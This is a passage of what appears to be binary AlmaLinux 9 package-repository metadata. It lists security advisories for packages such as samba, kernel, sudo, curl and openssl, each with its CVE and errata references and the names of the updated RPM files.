update�!��z�mhttps://access.redhat.com/errata/RHSA-2022:8317RHSA-2022:8317RHSA-2022:8317https://access.redhat.com/security/cve/CVE-2022-32742CVE-2022-32742CVE-2022-32742https://bugzilla.redhat.com/21081962108196https://errata.almalinux.org/9/ALSA-2022-8317.htmlALSA-2022:8317ALSA-2022:8317�Z=samba-winbind-4.16.4-101.el9.x86_64.rpm�Y=samba-common-tools-4.16.4-101.el9.x86_64.rpm�0=libsmbclient-4.16.4-101.el9.x86_64.rpm�u=samba-common-4.16.4-101.el9.noarch.rpm�6=samba-winbind-modules-4.16.4-101.el9.x86_64.rpm�5=samba-libs-4.16.4-101.el9.x86_64.rpm�3=samba-client-libs-4.16.4-101.el9.i686.rpm�1=libwbclient-4.16.4-101.el9.x86_64.rpm�1=libwbclient-4.16.4-101.el9.i686.rpm�5=samba-libs-4.16.4-101.el9.i686.rpm�4=samba-common-libs-4.16.4-101.el9.i686.rpm�3=samba-client-libs-4.16.4-101.el9.x86_64.rpm�0=libsmbclient-4.16.4-101.el9.i686.rpm�2=python3-samba-4.16.4-101.el9.i686.rpm�X=samba-4.16.4-101.el9.x86_64.rpm�6=samba-winbind-modules-4.16.4-101.el9.i686.rpm�2=python3-samba-4.16.4-101.el9.x86_64.rpm�4=samba-common-libs-4.16.4-101.el9.x86_64.rpm�Z=samba-winbind-4.16.4-101.el9.x86_64.rpm�Y=samba-common-tools-4.16.4-101.el9.x86_64.rpm�0=libsmbclient-4.16.4-101.el9.x86_64.rpm�u=samba-common-4.16.4-101.el9.noarch.rpm�6=samba-winbind-modules-4.16.4-101.el9.x86_64.rpm�5=samba-libs-4.16.4-101.el9.x86_64.rpm�3=samba-client-libs-4.16.4-101.el9.i686.rpm�1=libwbclient-4.16.4-101.el9.x86_64.rpm�1=libwbclient-4.16.4-101.el9.i686.rpm�5=samba-libs-4.16.4-101.el9.i686.rpm�4=samba-common-libs-4.16.4-101.el9.i686.rpm�3=samba-client-libs-4.16.4-101.el9.x86_64.rpm�0=libsmbclient-4.16.4-101.el9.i686.rpm�2=python3-samba-4.16.4-101.el9.i686.rpm�X=samba-4.16.4-101.el9.x86_64.rpm�6=samba-winbind-modules-4.16.4-101.el9.i686.rpm�2=python3-samba-4.16.4-101.el9.x86_64.rpm�4=samba-common-libs-4.16.4-101.el9.x86_64.rpm��ދN�F�	�ABBBBBBsecurityModerate: libldb security, bug fix, and enhancement update�!��g�Lhttps://access.redhat.com/errata/RHSA-2022:8318RHSA-2022:8318RHSA-2022:8318https://access.redhat.com/security/cve/CVE-2022-32746CVE-2022-32746CVE-2022-32746https://bugzilla.redhat.com/21082152108215https://errata.almalinux.org/9/ALSA-2022-8318.htmlALSA-2022:8318ALSA-2022:8318�D�fpython3-ldb-2.5.2-1.el9.i686.rpm�7�flibldb-2.5.2-1.el9.i686.rpm�a�fldb-tools-2.5.2-1.el9.x86_64.rpm�7�flibldb-2.5.2-1.el9.x86_64.rpm�D�fpython3-ldb-2.5.2-1.el9.x86_64.rpm�D�fpython3-ldb-2.5.2-1.el9.i686.rpm�7�flibldb-2.5.2-1.el9.i686.rpm�a�fldb-tools-2.5.2-1.el9.x86_64.rpm�7�flibldb-2.5.2-1.el9.x86_64.rpm�D�fpython3-ldb-2.5.2-1.el9.x86_64.rpm��ތ�G�0�JBsecurityModerate: freetype security update�!��3�Ohttps://access.redhat.com/errata/RHSA-2022:8340RHSA-2022:8340RHSA-2022:8340https://access.redhat.com/security/cve/CVE-2022-27404CVE-2022-27404CVE-2022-27404https://access.redhat.com/security/cve/CVE-2022-27405CVE-2022-27405CVE-2022-27405https://access.redhat.com/security/cve/CVE-2022-27406CVE-2022-27406CVE-2022-27406https://bugzilla.redhat.com/20779852077985https://bugzilla.redhat.com/20779892077989https://bugzilla.redhat.com/20779912077991https://errata.almalinux.org/9/ALSA-2022-8340.htmlALSA-2022:8340ALSA-2022:8340�(�sfreetype-2.10.4-9.el9.i686.rpm�(�sfreetype-2.10.4-9.el9.x86_64.rpm�(�sfreetype-2.10.4-9.el9.i686.rpm�(�sfreetype-2.10.4-9.el9.x86_64.rpm��ތ*�H�1�MBBBsecurityModerate: python3.9 security, bug fix, and enhancement update�!���5https://access.redhat.com/errata/RHSA-2022:8353RHSA-2022:8353RHSA-2022:8353https://access.redhat.com/security/cve/CVE-2015-20107CVE-2015-20107CVE-2015-20107https://access.redhat.com/security/cve/CVE-2021-28861CVE-2021-28861CVE-2021-28861https://bugzilla.redhat.com/20753902075390https://bugzilla.redhat.com/21206422120642https://errata.almalinux.org/9/ALSA-2022-8353.htmlALSA-2022:8353ALSA-2022:8353��
python3-3.9.14-1.el9.x86_64.rpm-�
python3-libs-3.9.14-1.el9.i686.rpm-�
python3-libs-3.9.14-1.el9.x86_64.rpm��
python3-3.9.14-1.el9.x86_64.rpm-�
python3-libs-3.9.14-1.el9.i686.rpm-�
python3-libs-3.9.14-1.el9.x86_64.rpm��ތ_�I�2�RBBBBBBBBBsecurityModerate: e2fsprogs security update�!��7�<https://access.redhat.com/errata/RHSA-2022:8361RHSA-2022:8361RHSA-2022:8361https://access.redhat.com/security/cve/CVE-2022-1304CVE-2022-1304CVE-2022-1304https://bugzilla.redhat.com/20697262069726https://errata.almalinux.org/9/ALSA-2022-8361.htmlALSA-2022:8361ALSA-2022:8361�&�;e2fsprogs-libs-1.46.5-3.el9.x86_64.rpm�=�;libss-1.46.5-3.el9.x86_64.rpm�&�;e2fsprogs-libs-1.46.5-3.el9.i686.rpm�/�;libcom_err-1.46.5-3.el9.i686.rpm�/�;libcom_err-1.46.5-3.el9.x86_64.rpm�=�;libss-1.46.5-3.el9.i686.rpm�[�;e2fsprogs-1.46.5-3.el9.x86_64.rpm�&�;e2fsprogs-libs-1.46.5-3.el9.x86_64.rpm�=�;libss-1.46.5-3.el9.x86_64.rpm�&�;e2fsprogs-libs-1.46.5-3.el9.i686.rpm�/�;libcom_err-1.46.5-3.el9.i686.rpm�/�;libcom_err-1.46.5-3.el9.x86_64.rpm�=�;libss-1.46.5-3.el9.i686.rpm�[�;e2fsprogs-1.46.5-3.el9.x86_64.rpm����p�J�3�]BsecurityModerate: harfbuzz security update�!��s�uhttps://access.redhat.com/errata/RHSA-2022:8384RHSA-2022:8384RHSA-2022:8384https://access.redhat.com/security/cve/CVE-2022-33068CVE-2022-33068CVE-2022-33068https://bugzilla.redhat.com/21026082102608https://errata.almalinux.org/9/ALSA-2022-8384.htmlALSA-2022:8384ALSA-2022:8384�)�harfbuzz-2.7.4-8.el9.x86_64.rpm�)�harfbuzz-2.7.4-8.el9.i686.rpm�)�harfbuzz-2.7.4-8.el9.x86_64.rpm�)�harfbuzz-2.7.4-8.el9.i686.rpm��ލ
�K�'�`BBBBBsecurityModerate: dhcp security and enhancement update�!��h�}https://access.redhat.com/errata/RHSA-2022:8385RHSA-2022:8385RHSA-2022:8385https://access.redhat.com/security/cve/CVE-2021-25220CVE-2021-25220CVE-2021-25220https://bugzilla.redhat.com/20645122064512https://errata.almalinux.org/9/ALSA-2022-8385.htmlALSA-2022:8385ALSA-2022:8385�b�dhcp-common-4.4.2-17.b1.el9.noarch.rpm�d�dhcp-server-4.4.2-17.b1.el9.x86_64.rpm�a�dhcp-client-4.4.2-17.b1.el9.x86_64.rpm�c�dhcp-relay-4.4.2-17.b1.el9.x86_64.rpm�b�dhcp-common-4.4.2-17.b1.el9.noarch.rpm�d�dhcp-server-4.4.2-17.b1.el9.x86_64.rpm�a�dhcp-client-4.4.2-17.b1.el9.x86_64.rpm�c�dhcp-relay-4.4.2-17.b1.el9.x86_64.rpm�����L�*�hsecurityModerate: logrotate security update�!��e�Jhttps://access.redhat.com/errata/RHSA-2022:8393RHSA-2022:8393RHSA-2022:8393https://access.redhat.com/security/cve/CVE-2022-1348CVE-2022-1348CVE-2022-1348https://bugzilla.redhat.com/20750742075074https://errata.almalinux.org/9/ALSA-2022-8393.htmlALSA-2022:8393ALSA-2022:8393�e�)logrotate-3.18.0-7.el9.x86_64.rpm�e�)logrotate-3.18.0-7.el9.x86_64.rpm����K�M�.�kBsecurityModerate: libtirpc security update�!��/�{https://access.redhat.com/errata/RHSA-2022:8400RHSA-2022:8400RHSA-2022:8400https://access.redhat.com/security/cve/CVE-2021-46828CVE-2021-46828CVE-2021-46828https://bugzilla.redhat.com/21093522109352https://errata.almalinux.org/9/ALSA-2022-8400.htmlALSA-2022:8400ALSA-2022:8400�?�]libtirpc-1.3.3-0.el9.i686.rpm�?�]libtirpc-1.3.3-0.el9.x86_64.rpm�?�]libtirpc-1.3.3-0.el9.i686.rpm�?�]libtirpc-1.3.3-0.el9.x86_64.rpm��ލR�N�1�osecurityImportant: device-mapper-multipath security update�!'��*�.https://access.redhat.com/errata/RHSA-2022:8453RHSA-2022:8453RHSA-2022:8453https://access.redhat.com/security/cve/CVE-2022-3787CVE-2022-3787CVE-2022-3787https://bugzilla.redhat.com/21389592138959https://errata.almalinux.org/9/ALSA-2022-8453.htmlALSA-2022:8453ALSA-2022:8453�Q�device-mapper-multipath-0.8.7-12.el9_1.1.x86_64.rpm�Q�device-mapper-multipath-0.8.7-12.el9_1.1.x86_64.rpm����`�O�4�rBBBsecurityImportant: python3.9 security update�!'��X�Qhttps://access.redhat.com/errata/RHSA-2022:8493RHSA-2022:8493RHSA-2022:8493https://access.redhat.com/security/cve/CVE-2022-42919CVE-2022-42919CVE-2022-42919https://bugzilla.redhat.com/21387052138705https://errata.almalinux.org/9/ALSA-2022-8493.htmlALSA-2022:8493ALSA-2022:8493-�python3-libs-3.9.14-1.el9_1.1.i686.rpm��python3-3.9.14-1.el9_1.1.x86_64.rpm-�python3-libs-3.9.14-1.el9_1.1.x86_64.rpm-�python3-libs-3.9.14-1.el9_1.1.i686.rpm��python3-3.9.14-1.el9_1.1.x86_64.rpm-�python3-libs-3.9.14-1.el9_1.1.x86_64.rpm����|�P�5�wBBBBBBBBBBBBBBBsecurityImportant: krb5 security update�!'��)�ghttps://access.redhat.com/errata/RHSA-2022:8637RHSA-2022:8637RHSA-2022:8637https://access.redhat.com/security/cve/CVE-2022-42898CVE-2022-42898CVE-2022-42898https://bugzilla.redhat.com/21409602140960https://errata.almalinux.org/9/ALSA-2022-8637.htmlALSA-2022:8637ALSA-2022:8637�%�krb5-pkinit-1.19.1-24.el9_1.i686.rpm�'�krb5-server-ldap-1.19.1-24.el9_1.i686.rpm�$�krb5-libs-1.19.1-24.el9_1.x86_64.rpm�&�krb5-server-1.19.1-24.el9_1.x86_64.rpm�'�krb5-server-ldap-1.19.1-24.el9_1.x86_64.rpm�(�libkadm5-1.19.1-24.el9_1.x86_64.rpm�$�krb5-libs-1.19.1-24.el9_1.i686.rpm�p�krb5-workstation-1.19.1-24.el9_1.x86_64.rpm�&�krb5-server-1.19.1-24.el9_1.i686.rpm�(�libkadm5-1.19.1-24.el9_1.i686.rpm�%�krb5-pkinit-1.19.1-24.el9_1.x86_64.rpm�%�krb5-pkinit-1.19.1-24.el9_1.i686.rpm�'�krb5-server-ldap-1.19.1-24.el9_1.i686.rpm�$�krb5-libs-1.19.1-24.el9_1.x86_64.rpm�&�krb5-server-1.19.1-24.el9_1.x86_64.rpm�'�krb5-server-ldap-1.19.1-24.el9_1.x86_64.rpm�(�libkadm5-1.19.1-24.el9_1.x86_64.rpm�$�krb5-libs-1.19.1-24.el9_1.i686.rpm�p�krb5-workstation-1.19.1-24.el9_1.x86_64.rpm�&�krb5-server-1.19.1-24.el9_1.i686.rpm�(�libkadm5-1.19.1-24.el9_1.i686.rpm�%�krb5-pkinit-1.19.1-24.el9_1.x86_64.rpm�����Q�6�HsecurityImportant: sudo security update0'���https://access.redhat.com/errata/RHSA-2023:0282RHSA-2023:0282RHSA-2023:0282https://access.redhat.com/security/cve/CVE-2023-22809CVE-2023-22809CVE-2023-22809https://bugzilla.redhat.com/21611422161142https://errata.almalinux.org/9/ALSA-2023-0282.htmlALSA-2023:0282ALSA-2023:0282�S�sudo-1.9.5p2-7.el9_1.1.x86_64.rpm�S�sudo-1.9.5p2-7.el9_1.1.x86_64.rpm����O�R�7�JBBBBBBBBsecurityModerate: curl security update0���&https://access.redhat.com/errata/RHSA-2023:0333RHSA-2023:0333RHSA-2023:0333https://access.redhat.com/security/cve/CVE-2022-32221CVE-2022-32221CVE-2022-32221https://bugzilla.redhat.com/21354112135411https://errata.almalinux.org/9/ALSA-2023-0333.htmlALSA-2023:0333ALSA-2023:0333�)�Dcurl-7.76.1-19.el9_1.1.x86_64.rpm|�Dlibcurl-minimal-7.76.1-19.el9_1.1.x86_64.rpm{�Dlibcurl-7.76.1-19.el9_1.1.x86_64.rpm{�Dlibcurl-7.76.1-19.el9_1.1.i686.rpm|�Dlibcurl-minimal-7.76.1-19.el9_1.1.i686.rpm�*�Dcurl-minimal-7.76.1-19.el9_1.1.x86_64.rpm�)�Dcurl-7.76.1-19.el9_1.1.x86_64.rpm|�Dlibcurl-minimal-7.76.1-19.el9_1.1.x86_64.rpm{�Dlibcurl-7.76.1-19.el9_1.1.x86_64.rpm{�Dlibcurl-7.76.1-19.el9_1.1.i686.rpm|�Dlibcurl-minimal-7.76.1-19.el9_1.1.i686.rpm�*�Dcurl-minimal-7.76.1-19.el9_1.1.x86_64.rpm�����S�8�TBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security and bug fix update0'��D�;https://access.redhat.com/errata/RHSA-2023:0334RHSA-2023:0334RHSA-2023:0334https://access.redhat.com/security/cve/CVE-2022-2959CVE-2022-2959CVE-2022-2959https://access.redhat.com/security/cve/CVE-2022-2964CVE-2022-2964CVE-2022-2964https://access.redhat.com/security/cve/CVE-2022-30594CVE-2022-30594CVE-2022-30594https://access.redhat.com/security/cve/CVE-2022-3077CVE-2022-3077CVE-2022-3077https://access.redhat.com/security/cve/CVE-2022-4139CVE-2022-4139CVE-2022-4139https://access.redhat.com/security/cve/CVE-2022-43945CVE-2022-43945CVE-2022-43945https://bugzilla.redhat.com/20674822067482https://bugzilla.redhat.com/20853002085300https://bugzilla.redhat.com/21036812103681https://bugzilla.redhat.com/21233092123309https://bugzilla.redhat.com/21417522141752https://bugzilla.redhat.com/21475722147572https://errata.almalinux.org/9/ALSA-2023-0334.htmlALSA-2023:0334ALSA-2023:0334
}kernel-debug-modules-extra-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-modules-extra-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-modules-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-tools-5.14.0-162.12.1.el9_1.x86_64.rpm2}python3-perf-5.14.0-162.12.1.el9_1.x86_64.rpm1}bpftool-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-abi-stablelists-5.14.0-162.12.1.el9_1.noarch.rpm}kernel-core-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-core-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-modules-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-tools-libs-5.14.0-162.12.1.el9_1.x86_64.rpm
}kernel-debug-modules-extra-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-modules-extra-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-modules-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-tools-5.14.0-162.12.1.el9_1.x86_64.rpm2}python3-perf-5.14.0-162.12.1.el9_1.x86_64.rpm1}bpftool-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-abi-stablelists-5.14.0-162.12.1.el9_1.noarch.rpm}kernel-core-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-debug-core-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-modules-5.14.0-162.12.1.el9_1.x86_64.rpm}kernel-tools-libs-5.14.0-162.12.1.el9_1.x86_64.rpm����f�T�9�mBBBBBBsecurityModerate: dbus security update0���^https://access.redhat.com/errata/RHSA-2023:0335RHSA-2023:0335RHSA-2023:0335https://access.redhat.com/security/cve/CVE-2022-42010CVE-2022-42010CVE-2022-42010https://access.redhat.com/security/cve/CVE-2022-42011CVE-2022-42011CVE-2022-42011https://access.redhat.com/security/cve/CVE-2022-42012CVE-2022-42012CVE-2022-42012https://bugzilla.redhat.com/21336162133616https://bugzilla.redhat.com/21336172133617https://bugzilla.redhat.com/21336182133618https://errata.almalinux.org/9/ALSA-2023-0335.htmlALSA-2023:0335ALSA-2023:0335�^�ddbus-1.12.20-7.el9_1.x86_64.rpm�'�ddbus-libs-1.12.20-7.el9_1.x86_64.rpm�_�ddbus-common-1.12.20-7.el9_1.noarch.rpm�`�ddbus-tools-1.12.20-7.el9_1.x86_64.rpm�'�ddbus-libs-1.12.20-7.el9_1.i686.rpm�^�ddbus-1.12.20-7.el9_1.x86_64.rpm�'�ddbus-libs-1.12.20-7.el9_1.x86_64.rpm�_�ddbus-common-1.12.20-7.el9_1.noarch.rpm�`�ddbus-tools-1.12.20-7.el9_1.x86_64.rpm�'�ddbus-libs-1.12.20-7.el9_1.i686.rpm����}�U�:�uBBBBBBBBBBBBBBBBsecurityModerate: systemd security update0��]�Qhttps://access.redhat.com/errata/RHSA-2023:0336RHSA-2023:0336RHSA-2023:0336https://access.redhat.com/security/cve/CVE-2022-3821CVE-2022-3821CVE-2022-3821https://bugzilla.redhat.com/21393272139327https://errata.almalinux.org/9/ALSA-2023-0336.htmlALSA-2023:0336ALSA-2023:0336�^�systemd-container-250-12.el9_1.1.x86_64.rpm�_�systemd-libs-250-12.el9_1.1.i686.rpm�_�systemd-libs-250-12.el9_1.1.x86_64.rpm�p�systemd-rpm-macros-250-12.el9_1.1.noarch.rpm�B�systemd-oomd-250-12.el9_1.1.x86_64.rpm�D�systemd-resolved-250-12.el9_1.1.x86_64.rpm�^�systemd-container-250-12.el9_1.1.i686.rpm�]�systemd-250-12.el9_1.1.i686.rpm�E�systemd-udev-250-12.el9_1.1.x86_64.rpm�C�systemd-pam-250-12.el9_1.1.x86_64.rpm�]�systemd-250-12.el9_1.1.x86_64.rpm�^�systemd-container-250-12.el9_1.1.x86_64.rpm�_�systemd-libs-250-12.el9_1.1.i686.rpm�_�systemd-libs-250-12.el9_1.1.x86_64.rpm�p�systemd-rpm-macros-250-12.el9_1.1.noarch.rpm�B�systemd-oomd-250-12.el9_1.1.x86_64.rpm�D�systemd-resolved-250-12.el9_1.1.x86_64.rpm�^�systemd-container-250-12.el9_1.1.i686.rpm�]�systemd-250-12.el9_1.1.i686.rpm�E�systemd-udev-250-12.el9_1.1.x86_64.rpm�C�systemd-pam-250-12.el9_1.1.x86_64.rpm�]�systemd-250-12.el9_1.1.x86_64.rpm�����V�;�GBsecurityModerate: expat security update0��.�}https://access.redhat.com/errata/RHSA-2023:0337RHSA-2023:0337RHSA-2023:0337https://access.redhat.com/security/cve/CVE-2022-43680CVE-2022-43680CVE-2022-43680https://bugzilla.redhat.com/21400592140059https://errata.almalinux.org/9/ALSA-2023-0337.htmlALSA-2023:0337ALSA-2023:0337�"�texpat-2.4.9-1.el9_1.1.i686.rpm�"�texpat-2.4.9-1.el9_1.1.x86_64.rpm�"�texpat-2.4.9-1.el9_1.1.i686.rpm�"�texpat-2.4.9-1.el9_1.1.x86_64.rpm�����W�<�JBBBsecurityModerate: libxml2 security update0��+�Fhttps://access.redhat.com/errata/RHSA-2023:0338RHSA-2023:0338RHSA-2023:0338https://access.redhat.com/security/cve/CVE-2022-40303CVE-2022-40303CVE-2022-40303https://access.redhat.com/security/cve/CVE-2022-40304CVE-2022-40304CVE-2022-40304https://bugzilla.redhat.com/21362662136266https://bugzilla.redhat.com/21362882136288https://errata.almalinux.org/9/ALSA-2023-0338.htmlALSA-2023:0338ALSA-2023:0338��libxml2-2.9.13-3.el9_1.i686.rpm��libxml2-2.9.13-3.el9_1.x86_64.rpm�O�python3-libxml2-2.9.13-3.el9_1.x86_64.rpm��libxml2-2.9.13-3.el9_1.i686.rpm��libxml2-2.9.13-3.el9_1.x86_64.rpm�O�python3-libxml2-2.9.13-3.el9_1.x86_64.rpm�����X�=�OBsecurityModerate: sqlite security update0��q�<https://access.redhat.com/errata/RHSA-2023:0339RHSA-2023:0339RHSA-2023:0339https://access.redhat.com/security/cve/CVE-2022-35737CVE-2022-35737CVE-2022-35737https://bugzilla.redhat.com/21102912110291https://errata.almalinux.org/9/ALSA-2023-0339.htmlALSA-2023:0339ALSA-2023:0339�\�sqlite-libs-3.34.1-6.el9_1.i686.rpm�\�sqlite-libs-3.34.1-6.el9_1.x86_64.rpm�\�sqlite-libs-3.34.1-6.el9_1.i686.rpm�\�sqlite-libs-3.34.1-6.el9_1.x86_64.rpm����~�Y��RsecurityModerate: bash security update0��-�}https://access.redhat.com/errata/RHSA-2023:0340RHSA-2023:0340RHSA-2023:0340https://access.redhat.com/security/cve/CVE-2022-3715CVE-2022-3715CVE-2022-3715https://bugzilla.redhat.com/21267202126720https://errata.almalinux.org/9/ALSA-2023-0340.htmlALSA-2023:0340ALSA-2023:0340�T�3bash-5.1.8-6.el9_1.x86_64.rpm�T�3bash-5.1.8-6.el9_1.x86_64.rpm�����Z�>�UBsecurityModerate: libtasn1 security update0��*�uhttps://access.redhat.com/errata/RHSA-2023:0343RHSA-2023:0343RHSA-2023:0343https://access.redhat.com/security/cve/CVE-2021-46848CVE-2021-46848CVE-2021-46848https://bugzilla.redhat.com/21400582140058https://errata.almalinux.org/9/ALSA-2023-0343.htmlALSA-2023:0343ALSA-2023:0343�1�libtasn1-4.16.0-8.el9_1.x86_64.rpm�1�libtasn1-4.16.0-8.el9_1.i686.rpm�1�libtasn1-4.16.0-8.el9_1.x86_64.rpm�1�libtasn1-4.16.0-8.el9_1.i686.rpm����O�[��XBsecurityImportant: libksba security update0'���Jhttps://access.redhat.com/errata/RHSA-2023:0626RHSA-2023:0626RHSA-2023:0626https://access.redhat.com/security/cve/CVE-2022-47629CVE-2022-47629CVE-2022-47629https://bugzilla.redhat.com/21615712161571https://errata.almalinux.org/9/ALSA-2023-0626.htmlALSA-2023:0626ALSA-2023:0626�+�ilibksba-1.5.1-6.el9_1.x86_64.rpm�+�ilibksba-1.5.1-6.el9_1.i686.rpm�+�ilibksba-1.5.1-6.el9_1.x86_64.rpm�+�ilibksba-1.5.1-6.el9_1.i686.rpm����s�\�/�\BBBBBBBBBBBBBBBBBsecurityModerate: grub2 security update0��i�Chttps://access.redhat.com/errata/RHSA-2023:0752RHSA-2023:0752RHSA-2023:0752https://access.redhat.com/security/cve/CVE-2022-2601CVE-2022-2601CVE-2022-2601https://access.redhat.com/security/cve/CVE-2022-3775CVE-2022-3775CVE-2022-3775https://bugzilla.redhat.com/21129752112975https://bugzilla.redhat.com/21388802138880https://errata.almalinux.org/9/ALSA-2023-0752.htmlALSA-2023:0752ALSA-2023:0752�m�	grub2-tools-efi-2.06-46.el9_1.3.alma.x86_64.rpm�l�	grub2-tools-2.06-46.el9_1.3.alma.x86_64.rpm�<�	grub2-common-2.06-46.el9_1.3.alma.noarch.rpm�n�	grub2-tools-extra-2.06-46.el9_1.3.alma.x86_64.rpm�o�	grub2-tools-minimal-2.06-46.el9_1.3.alma.x86_64.rpm�=�	grub2-efi-aa64-modules-2.06-46.el9_1.3.alma.noarch.rpm��	grub2-ppc64le-modules-2.06-46.el9_1.3.alma.noarch.rpm�k�	grub2-pc-2.06-46.el9_1.3.alma.x86_64.rpm�?�	grub2-pc-modules-2.06-46.el9_1.3.alma.noarch.rpm�>�	grub2-efi-x64-modules-2.06-46.el9_1.3.alma.noarch.rpm�j�	grub2-efi-x64-cdboot-2.06-46.el9_1.3.alma.x86_64.rpm�i�	grub2-efi-x64-2.06-46.el9_1.3.alma.x86_64.rpm�m�	grub2-tools-efi-2.06-46.el9_1.3.alma.x86_64.rpm�l�	grub2-tools-2.06-46.el9_1.3.alma.x86_64.rpm�<�	grub2-common-2.06-46.el9_1.3.alma.noarch.rpm�n�	grub2-tools-extra-2.06-46.el9_1.3.alma.x86_64.rpm�o�	grub2-tools-minimal-2.06-46.el9_1.3.alma.x86_64.rpm�=�	grub2-efi-aa64-modules-2.06-46.el9_1.3.alma.noarch.rpm��	grub2-ppc64le-modules-2.06-46.el9_1.3.alma.noarch.rpm�k�	grub2-pc-2.06-46.el9_1.3.alma.x86_64.rpm�?�	grub2-pc-modules-2.06-46.el9_1.3.alma.noarch.rpm�>�	grub2-efi-x64-modules-2.06-46.el9_1.3.alma.noarch.rpm�j�	grub2-efi-x64-cdboot-2.06-46.el9_1.3.alma.x86_64.rpm�i�	grub2-efi-x64-2.06-46.el9_1.3.alma.x86_64.rpm����#�]�?�pBBBsecurityModerate: openssl security and bug fix update0��,�"https://access.redhat.com/errata/RHSA-2023:0946RHSA-2023:0946RHSA-2023:0946https://access.redhat.com/security/cve/CVE-2022-4203CVE-2022-4203CVE-2022-4203https://access.redhat.com/security/cve/CVE-2022-4304CVE-2022-4304CVE-2022-4304https://access.redhat.com/security/cve/CVE-2022-4450CVE-2022-4450CVE-2022-4450https://access.redhat.com/security/cve/CVE-2023-0215CVE-2023-0215CVE-2023-0215https://access.redhat.com/security/cve/CVE-2023-0216CVE-2023-0216CVE-2023-0216https://access.redhat.com/security/cve/CVE-2023-0217CVE-2023-0217CVE-2023-0217https://access.redhat.com/security/cve/CVE-2023-0286CVE-2023-0286CVE-2023-0286https://access.redhat.com/security/cve/CVE-2023-0401CVE-2023-0401CVE-2023-0401https://bugzilla.redhat.com/21644402164440https://bugzilla.redhat.com/21644872164487https://bugzilla.redhat.com/21644882164488https://bugzilla.redhat.com/21644922164492https://bugzilla.redhat.com/21644942164494https://bugzilla.redhat.com/21644972164497https://bugzilla.redhat.com/21644992164499https://bugzilla.redhat.com/21645002164500https://errata.almalinux.org/9/ALSA-2023-0946.htmlALSA-2023:0946ALSA-2023:0946��topenssl-libs-3.0.1-47.el9_1.i686.rpm�:�topenssl-3.0.1-47.el9_1.x86_64.rpm��topenssl-libs-3.0.1-47.el9_1.x86_64.rpm��topenssl-libs-3.0.1-47.el9_1.i686.rpm�:�topenssl-3.0.1-47.el9_1.x86_64.rpm��topenssl-libs-3.0.1-47.el9_1.x86_64.rpm����r�^��uBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security and bug fix update0'��N�~https://access.redhat.com/errata/RHSA-2023:0951RHSA-2023:0951RHSA-2023:0951https://access.redhat.com/security/cve/CVE-2022-2873CVE-2022-2873CVE-2022-2873https://access.redhat.com/security/cve/CVE-2022-3564CVE-2022-3564CVE-2022-3564https://access.redhat.com/security/cve/CVE-2022-4378CVE-2022-4378CVE-2022-4378https://access.redhat.com/security/cve/CVE-2022-4379CVE-2022-4379CVE-2022-4379https://access.redhat.com/security/cve/CVE-2023-0179CVE-2023-0179CVE-2023-0179https://bugzilla.redhat.com/21190482119048https://bugzilla.redhat.com/21509992150999https://bugzilla.redhat.com/21525482152548https://bugzilla.redhat.com/21528072152807https://bugzilla.redhat.com/21617132161713https://errata.almalinux.org/9/ALSA-2023-0951.htmlALSA-2023:0951ALSA-2023:0951
~kernel-abi-stablelists-5.14.0-162.18.1.el9_1.noarch.rpm~kernel-tools-libs-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-tools-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-modules-extra-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-core-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-modules-5.14.0-162.18.1.el9_1.x86_64.rpm1~bpftool-5.14.0-162.18.1.el9_1.x86_64.rpm2~python3-perf-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-core-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-modules-extra-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-modules-5.14.0-162.18.1.el9_1.x86_64.rpm
~kernel-abi-stablelists-5.14.0-162.18.1.el9_1.noarch.rpm~kernel-tools-libs-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-tools-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-modules-extra-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-core-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-modules-5.14.0-162.18.1.el9_1.x86_64.rpm1~bpftool-5.14.0-162.18.1.el9_1.x86_64.rpm2~python3-perf-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-core-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-modules-extra-5.14.0-162.18.1.el9_1.x86_64.rpm~kernel-debug-modules-5.14.0-162.18.1.el9_1.x86_64.rpm�����_��NsecurityModerate: python-setuptools security update0��L�^https://access.redhat.com/errata/RHSA-2023:0952RHSA-2023:0952RHSA-2023:0952https://access.redhat.com/security/cve/CVE-2022-40897CVE-2022-40897CVE-2022-40897https://bugzilla.redhat.com/21585592158559https://errata.almalinux.org/9/ALSA-2023-0952.htmlALSA-2023:0952ALSA-2023:0952�K�Ppython3-setuptools-wheel-53.0.0-10.el9_1.1.noarch.rpm�J�Ppython3-setuptools-53.0.0-10.el9_1.1.noarch.rpm�K�Ppython3-setuptools-wheel-53.0.0-10.el9_1.1.noarch.rpm�J�Ppython3-setuptools-53.0.0-10.el9_1.1.noarch.rpm����l�`��QBBBsecurityModerate: python3.9 security 